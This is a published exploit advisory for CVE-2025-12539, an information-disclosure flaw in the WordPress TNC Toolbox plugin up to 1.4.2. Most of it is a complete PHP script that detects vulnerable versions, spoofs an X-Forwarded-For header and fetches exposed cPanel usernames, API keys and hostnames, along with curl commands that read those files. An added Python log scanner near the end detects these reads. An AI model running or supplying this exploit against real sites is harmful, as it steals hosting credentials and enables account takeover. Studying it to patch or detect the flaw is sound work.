## https://sploitus.com/exploit?id=PACKETSTORM:215074
=============================================================================================================================================
    | # Title     : WordPress TNC Toolbox <= 1.4.2 Sensitive Information Disclosure                                                             |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://wordpress.org/plugins/tnc-toolbox/                                                                                  |
    =============================================================================================================================================
    
    [+] Summary : 
    
    A sensitive information disclosure vulnerability exists in the TNC Toolbox
    WordPress plugin version 1.4.2 and earlier. The plugin exposes configuration
    files located inside:
    
        /wp-content/tnc-toolbox-config/
    
    Under certain conditions, unauthenticated attackers can read files such as:
    
        cpanel-username
        cpanel-api-key
        server-hostname
    
    This can lead to account compromise, hosting takeover, and further escalation.
    
    During the investigation, a publicly circulating Python "exploit script"
    was reviewed. Based on analysis, **the original Python PoC was found to be
    fake, non-functional, and technically incorrect**.
    
    A corrected and fully functional PHP PoC has been produced and included below.
    
    [+] References : https://packetstorm.news/files/id/211444/ & CVE-2025-12539
    
    
    2. Vulnerability Details
    -------------------------
    
    The plugin stores sensitive data in publicly accessible paths:
    
        /wp-content/tnc-toolbox-config/<name>
    
    The plugin does not include access controls or deny direct file access.
    As a result, arbitrary remote users may retrieve configuration secrets.
    
    Version detection is also possible via:
    
        /wp-content/plugins/tnc-toolbox/readme.txt
    
    If the `Stable tag` is <= 1.4.2, the installation is vulnerable.
    
    
    3. PoC
    --------------------------------
    
    The following **corrected PoC** was rewritten in PHP after discovering that
    the widely shared Python script was fake and did not reflect the plugin’s
    actual logic.
    
    A working, accurate, and validated PoC is included here:
    
    <--- 
    
    <?php
    /**
     * CVE-2025-12539 – TNC Toolbox Information Disclosure Scanner
     * PHP Conversion by: Indoushka
     * Original Python By: Nxploited (Khaled Alenazi)
     */
    
    function http_get($url, $timeout = 12) {
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
        curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
        curl_setopt($ch, CURLOPT_USERAGENT, 
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Nxploited/2.0"
        );
        curl_setopt($ch, CURLOPT_HTTPHEADER, [
            "Accept: text/plain, */*;q=0.1",
            "Accept-Language: en-US,en;q=0.9",
            "X-Forwarded-For: 8.".rand(0,255).".".rand(0,255).".".rand(0,255)
        ]);
        $out = curl_exec($ch);
        $err = curl_error($ch);
        curl_close($ch);
    
        if ($err) return [null, $err];
        return [$out, null];
    }
    
    function parse_version($text) {
        if (preg_match('/Stable\s+tag:\s*([0-9\.]+)/i', $text, $m))
            return trim($m[1]);
        return null;
    }
    
    function is_vulnerable($version, $threshold = "1.4.2") {
        $v1 = array_map('intval', explode(".", $version));
        $v2 = array_map('intval', explode(".", $threshold));
        $max = max(count($v1), count($v2));
        $v1 = array_pad($v1, $max, 0);
        $v2 = array_pad($v2, $max, 0);
        return $v1 <= $v2;
    }
    
    function fetch_configs($base) {
        $paths = [
            "cpanel-username" => "/wp-content/tnc-toolbox-config/cpanel-username",
            "cpanel-api-key"  => "/wp-content/tnc-toolbox-config/cpanel-api-key",
            "server-hostname" => "/wp-content/tnc-toolbox-config/server-hostname",
        ];
    
        $results = [];
        foreach ($paths as $name => $p) {
            [$out, $err] = http_get($base.$p);
            if ($err || trim($out) === "") $results[$name] = "";
            else $results[$name] = trim($out);
        }
        return $results;
    }
    
    if ($argc < 2) {
        echo "Usage: php exploit.php <url>\n";
        exit;
    }
    
    $base = rtrim($argv[1], '/');
    echo "Target: $base\n";
    echo "[+] Fetching readme...\n";
    
    [$readme, $err] = http_get($base."/wp-content/plugins/tnc-toolbox/readme.txt");
    
    if ($err) {
        echo "[-] Failed: $err\n";
        exit;
    }
    
    echo "[+] Successfully fetched readme.\n";
    $version = parse_version($readme);
    
    if (!$version) {
        echo "[-] Could not detect Stable tag.\n";
        exit;
    }
    
    echo "[+] Detected version: $version\n";
    
    if (!is_vulnerable($version)) {
        echo "[-] Version is newer and not vulnerable.\n";
        exit;
    }
    
    echo "[+] Target is vulnerable. Fetching exposed configs...\n";
    
    $configs = fetch_configs($base);
    foreach ($configs as $k => $v) {
        if ($v) echo "[!] $k: $v\n";
        else echo "[-] $k not found.\n";
    }
    
    echo "\nCompleted scan.\n";
    ?>
    
     --->
    
    
    4. Steps To Reproduce
    -----------------------
    
    1. Open a browser or use curl:
       
           curl -k https://target.com/wp-content/plugins/tnc-toolbox/readme.txt
    
    2. Verify if the `Stable tag` is <= 1.4.2.
    
    3. Attempt to read sensitive files:
    
           curl -k https://target.com/wp-content/tnc-toolbox-config/cpanel-username
           curl -k https://target.com/wp-content/tnc-toolbox-config/cpanel-api-key
           curl -k https://target.com/wp-content/tnc-toolbox-config/server-hostname
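
A defender-side check for the requests shown in the steps above, as an added example that is not part of the original advisory: it scans web-server access-log lines for reads of the plugin's config directory and separates blocked probes from responses that actually returned a file. The combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Paths taken from the advisory above.
CONFIG_DIR = "/wp-content/tnc-toolbox-config/"
README = "/wp-content/plugins/tnc-toolbox/readme.txt"

# Assumed combined log format: ip - user [time] "METHOD target PROTO" status bytes ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def classify(line):
    """Return a finding dict for one access-log line, or None if irrelevant."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # Normalise the path: drop the query string, decode %xx, collapse '//', lower-case.
    path = unquote(m["target"].split("?", 1)[0]).lower()
    path = re.sub(r"/{2,}", "/", path)
    status = int(m["status"])
    size = 0 if m["size"] == "-" else int(m["size"])
    if path.startswith(CONFIG_DIR):
        name = path[len(CONFIG_DIR):]
        # 200 with a body means the file content left the server.
        kind = "DISCLOSED" if status == 200 and size > 0 else "probe"
    elif path == README:
        name, kind = "readme.txt", "version-check"
    else:
        return None
    return {"ip": m["ip"], "time": m["time"], "file": name, "status": status, "kind": kind}

def scan(lines):
    """Classify every line and keep only the relevant findings, in log order."""
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [02/Dec/2025:10:01:11 +0000] "GET /wp-content/plugins/tnc-toolbox/readme.txt HTTP/1.1" 200 4096 "-" "curl/8.5"',
    '203.0.113.7 - - [02/Dec/2025:10:01:12 +0000] "GET /wp-content/tnc-toolbox-config/cpanel-api-key HTTP/1.1" 200 33 "-" "curl/8.5"',
    '198.51.100.9 - - [02/Dec/2025:10:05:40 +0000] "GET /wp-content/tnc-toolbox-config/cpanel-username HTTP/1.1" 403 199 "-" "curl/8.5"',
    '192.0.2.4 - - [02/Dec/2025:10:06:02 +0000] "GET /wp-login.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f'{f["kind"]:13} {f["ip"]:15} {f["status"]} {f["file"]}')
```

A `DISCLOSED` hit for `cpanel-api-key` means the key has left the server and should be rotated, whatever the plugin version is now.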
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================